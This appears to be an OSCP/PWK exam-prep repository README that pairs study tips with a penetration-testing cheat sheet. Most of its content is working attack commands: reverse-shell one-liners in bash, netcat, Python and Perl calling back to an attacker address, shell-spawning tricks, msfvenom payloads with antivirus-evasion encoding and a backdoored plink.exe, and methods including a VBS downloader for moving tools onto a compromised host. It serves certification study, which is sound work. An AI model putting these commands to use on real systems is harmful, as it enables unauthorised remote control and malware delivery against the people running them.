/OSCP-PWK-Repo

The stuff I gathered during my time at the PWK labs and my OSCP exam.

OSCP / PWK Repo

Emblem

During my time at the PWK labs and for my OSCP preparation, I gathered a big amount of useful stuff that I want to share and make available to the community. With a huge amount of respect to the Offensive Security team, I will not disclose anything about the labs and the exam, but I will give general information and study lines for the young padawans out there who want to TRY HARDER!!!

Note: There is high probability that you will get nothing new from this repo. These are just my notes and sources, and you can find everything online but they are gathered in a way that suited me by the time of my exam. :)

Some Useful Tips:

  • TRY HARDER (Yes, you will hear it a lot but this is the only way)
  • Methodology, methodology, methodology
  • Use the forums if you are stuck
  • Do not use Metasploit (I mean you can use it, but why ;) )
  • Learn your PrivEsc
  • Manage your time
  • Make a lab report (It saved me :P)
  • Most of the times there is more than one way with which you can achieve something ;)
  • If you find yourself executing the same commands for more than 10 minutes maybe you have to look elsewhere
  • Take breaks

General Links

Enumeration

Web

Shell Exploitation

Reverse Shells

  • bash -i >& /dev/tcp/10.10.10.10/4443 0>&1
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 4443 >/tmp/f
  • nc -e /bin/sh 10.10.10.10 4443
  • nc -e cmd.exe 10.10.10.10 4443
  • python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • perl -e 'use Socket;$i="10.10.10.10";$p=4443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Spawn TTY Shells

  • python -c 'import pty; pty.spawn("/bin/sh")'
  • echo os.system('/bin/bash')
  • /bin/sh -i
  • perl —e 'exec "/bin/sh";'
  • perl: exec "/bin/sh";
  • ruby: exec "/bin/sh"
  • lua: os.execute('/bin/sh')
  • (From within IRB): exec "/bin/sh"
  • (From within vi): :!bash
  • (From within vi): :set shell=/bin/bash:shell
  • (From within nmap): !sh

msfvenom payloads

  • PHP reverse shell: msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php
  • Java WAR reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war
  • Linux bind shell: msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
  • Linux FreeBSD reverse shell: msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf
  • Linux C reverse shell: msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c
  • Windows non staged reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe
  • Windows Staged (Meterpreter) reverse shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
  • Windows Python reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py
  • Windows ASP reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp
  • Windows ASPX reverse shell: msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
  • Windows JavaScript reverse shell with nops: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18
  • Windows Powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
  • Windows reverse shell excluding bad characters: msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai
  • Windows x64 bit reverse shell: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe
  • Windows reverse shell embedded into plink: msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

File Transfers

HTTP

# In Kali
python -m SimpleHTTPServer 80

# In reverse shell - Linux
wget 10.10.10.10/file

# In reverse shell - Windows
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"
FTP

# In Kali
python -m pyftpdlib -p 21 -w

# In reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt 
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt

“Name the filename as ‘file’ on your kali machine so that you don’t have to re-write the script multiple names, you can then rename the file on windows.”
TFTP

# In Kali
atftpd --daemon --port 69 /tftp

# In reverse shell
tftp -i 10.10.10.10 GET nc.exe
VBS

If FTP/TFTP fails you, this wget script in VBS is the go to on Windows machines.

# In reverse shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

# Execute
cscript wget.vbs http://10.10.10.10/file.exe file.exe

Privilege Escalation

Common priviledge escalation exploits and scripts: https://github.com/AusJock/Privilege-Escalation

Linux

Windows

Offensive Security Links

Books